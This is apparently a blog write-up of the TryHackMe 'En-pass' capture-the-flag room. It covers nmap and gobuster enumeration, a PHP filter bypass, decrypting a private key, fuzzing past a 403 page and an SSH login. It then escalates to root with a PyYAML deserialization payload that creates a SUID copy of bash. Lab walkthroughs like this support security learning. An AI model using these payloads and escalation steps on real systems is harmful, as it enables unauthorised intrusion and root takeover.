En-pass — TryHackMe

This is the write-up for TryHackMe’s room named En-pass: Get what you can’t.This room can be found at this URL:

https://tryhackme.com/room/enpass

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.248.167

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,8001 10.10.248.167

So we have SSH at port 22 and a Website at port 8001. First let’s explore the website.Open it up in your favorite browser and we see some images and some text printed on them.We can view all these text by doing view source on the web page:

Ehvw ri Oxfn!! is Caesar Cipher for Best of Luck with shift value of 3

U2FkCg== base64 for Sad

Well looked like we were trolled.

Gobuster

Time to do directory Brute Forcing. Let’s use gobuster:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt -u http://10.10.240.162:8001 -t 40

Explore /reg.php found above:

If we input something e.g. 1234 we see in the response back from the server contains the following php code:

So we need to bypass the filter in the above code to move forward. Reading the code the following conditions should met for the input to pass the filters:

  • Lowercase/uppercase alphabets and numbers are not allowed.
  • Input is splited in to chunks with ‘,’ as the delimiter and individual chunks should have certain lengths as mentioned in the code.A sum variable is calculated based on all the conditions match and compared with value 9 to give is the result, which is the way forward.

I used an online php compiler to debug the code and finally figured out the input which will give is the result. Input can contain symbols so used ‘$’ and also made the individual chunks of the required lengths.

Submit this input and got a password:

$$,$$,$$,$$$,$$,$$,$$,$$,$$$

Also Exploring /web directory above with gobuster we found one more directory named resources:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt -u http://10.10.240.162:8001/web -t 40

Keep exploring these directories further with gobuster we will find our first answer — the Path. Browsing to this path in browser gives us an Encrypted Private key which we will download using wget:

We have a password and an Encrypted Private key, let’s use both of them and see if we can get a private key which we can use:

openssl rsa -in key -out id_rsa

Using this private key and password as the passphrase, tried few user names like sadman,sau,cimihan which we found earlier but it didn’t worked.Maybe there is a different username which we need to find out.During directory brute forcing we saw another page /403.php and the hint given is “The path you get will forbid to see but you can bypass it.”. So to move forward we somehow need to bypass 403.php. Searching around found this tool which can “Fuzz 403ing endpoints for bypasses”:

https://github.com/intrudir/403fuzzer

This tool can send the request via the proxy as well, so we will start Burp Suite with intercept off and will analyse the requests and responses.Let’s run the tool as:

python 403fuzzer.py -u http://10.10.141.184:8001/403.php — proxy http://localhost:8080

Sorted the output in the Proxy Tab in Burp Suite with status code and found one request and response pair which gave a different response.That response had a new user name.

Lets use this username to do SSH with the private key:

ssh -i id_rsa USERNAME@10.10.141.184

So we were able to login using this new username found and also got the user’s flag.

Privilege Escalation

Upgrade the shell using the following command so that it is more usable:

/usr/bin/script -qc /bin/bash /dev/null

Ran both linPEAS and lse privilege escalation scripts but nothing jumps out. Manually browsing the file system found one interesting script located here /opt/scripts/file.py

imsau@enpass:/opt/scripts$ cat file.py 
#!/usr/bin/python
import yaml
class Execute():
def __init__(self,file_name ="/tmp/file.yml"):
self.file_name = file_name
self.read_file = open(file_name ,"r")
def run(self):
return self.read_file.read()
data = yaml.load(Execute().run())

This looks to be our way to get root.This file is owned by root.But their is no cronjob that is executing this python file. Looking closely /tmp/file.yml is in the constructor, but couldn't find that in /tmp. May be the root user is deleting it. Let’s confirm this by making a file with the same name in /tmp

And sure enough file.yml is getting deleted every minute. This link points to an issue which we can exploit:

https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation

python -c ‘import yaml; yaml.load(“!!python/object/new:os.system [echo EXPLOIT!]”)’

We will create a file /tmp/file.yml with the following content:

!!python/object/new:os.system ["cp /bin/bash /tmp; chmod +s /tmp/bash"]

And after a minute or so we will a suid bash binary which we can run with -p option to get root shell and root flag:

That all. Thanks for reading. Have a nice one.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

#100DaysofCode Chapter 1 ~ HTML and CSS Basics

Common Amazon and Facebook Interview Question: Word Break

How Can I Change Drawer Icon in Flutter

iOS App Version 2.3.0

New satellite imagery, Nashville, Tennessee

Cool Python: Easy Protocol for Functions

Streaming Live Market Data from FTX & Binance Using Websocket in Python

How to Take a backup and Restore in Kubernetes

HOW TO CREATE CUSTOM COMMANDS IN LINUX.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

TryHackme: Annie

OSCP-Like Boxes — Blue Write-Up

Retro WriteUp | TryHackMe | Utkar5hM

Throwback — Part 1 — pfSense